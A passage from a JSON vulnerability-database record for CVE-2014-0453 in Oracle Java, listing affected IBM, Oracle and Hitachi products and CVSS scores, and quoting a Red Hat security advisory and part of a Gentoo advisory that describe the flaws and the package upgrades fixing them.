{ "cpe22Uri": "cpe:/a:ibm:ibm_fabric_manager", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:financial_transaction_manager", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:ims_enterprise_suite", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:infosphere_data_replication", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:infosphere_streams", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:lotus_quickr", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:multi-enterprise_integration_gateway", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:notes", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:operational_decision_manager", "vulnerable": true }, { "cpe22Uri": "cpe:/h:ibm:security_access_manager_for_mobile_appliance", "vulnerable": true }, { "cpe22Uri": "cpe:/o:ibm:security_access_manager_for_mobile_software", "vulnerable": true }, { "cpe22Uri": "cpe:/h:ibm:security_access_manager_for_web_appliance", "vulnerable": true }, { "cpe22Uri": "cpe:/o:ibm:security_access_manager_for_web_software", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:smartcloud_provisioning", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:websphere_business_events", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:websphere_ilog_jrules", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:websphere_operational_decision_management", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:rational_connector_for_sap_solution_manager", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:webshere_cast_iron", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ibm:webshere_cast_iron_cloud_integration", "vulnerable": true }, { "cpe22Uri": "cpe:/h:ibm:webshere_cast_iron_cloud_integration", "vulnerable": true }, { "cpe22Uri": "cpe:/a:oracle:jdk", "vulnerable": true }, { "cpe22Uri": "cpe:/a:oracle:jre", "vulnerable": true }, { "cpe22Uri": "cpe:/a:oracle:java_se", "vulnerable": true }, { "cpe22Uri": "cpe:/a:oracle:jrockit", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_enterprise", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_standard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_version_5", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_client", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_light_version_6", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_professional_version_6", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_standard_version_6", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_version_5", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_developers_kit_for_java", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_primary_server", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:cosminexus_studio", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_enterprise", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_smart_edition", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_standard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_client", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer_light", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer_standard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_operator", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_primary_server", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_server", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_service_architect", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hitachi:ucosminexus_service_platform", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002089" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126631" } ], "trust": 0.4 }, "cve": "CVE-2014-0453", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "CVE-2014-0453", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-67946", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0453", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0453", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-67946", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0453", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2014:0406-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0406.html\nIssue date: 2014-04-16\nCVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 \n CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 \n CVE-2014-0455 CVE-2014-0456 CVE-2014-0457 \n CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 \n CVE-2014-2398 CVE-2014-2402 CVE-2014-2403 \n CVE-2014-2412 CVE-2014-2413 CVE-2014-2414 \n CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit. \n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine. \n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0455, CVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451,\nCVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402,\nCVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926)\n1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335)\n1087446 - CVE-2014-2413 OpenJDK: method handle call hierachy bypass (Libraries, 8032686)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.el6_5.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.el6_5.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0454.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0455.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0456.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0459.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2397.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2402.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2403.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2413.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTTmzQXlSAg2UNWIIRAtKdAKCBGCXcmdsIke6rE6wALE8rmyh8PgCfVt/K\ni9yLmC1ovZP+Sr9z+PQskyk=\n=avQw\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201502-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: February 15, 2015\n Bugs: #507798, #508716, #517220, #525464\n ID: 201502-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s Java SE\nDevelopment Kit and Runtime Environment, the worst of which could lead\nto execution of arbitrary code. Please review the CVE\nidentifiers referenced below for details. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ndisclose, update, insert, or delete certain data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.71\"\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.71\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.71\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 2 ] CVE-2014-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432\n[ 3 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 4 ] CVE-2014-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448\n[ 5 ] CVE-2014-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449\n[ 6 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 7 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 8 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 9 ] CVE-2014-0454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454\n[ 10 ] CVE-2014-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455\n[ 11 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 12 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 13 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 14 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 15 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 16 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 17 ] CVE-2014-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463\n[ 18 ] CVE-2014-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464\n[ 19 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 20 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 21 ] CVE-2014-2401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401\n[ 22 ] CVE-2014-2402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402\n[ 23 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 24 ] CVE-2014-2409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409\n[ 25 ] CVE-2014-2410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410\n[ 26 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 27 ] CVE-2014-2413\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413\n[ 28 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 29 ] CVE-2014-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420\n[ 30 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 31 ] CVE-2014-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422\n[ 32 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 33 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n[ 34 ] CVE-2014-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428\n[ 35 ] CVE-2014-2483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483\n[ 36 ] CVE-2014-2490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490\n[ 37 ] CVE-2014-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208\n[ 38 ] CVE-2014-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209\n[ 39 ] CVE-2014-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216\n[ 40 ] CVE-2014-4218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218\n[ 41 ] CVE-2014-4219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219\n[ 42 ] CVE-2014-4220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220\n[ 43 ] CVE-2014-4221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221\n[ 44 ] 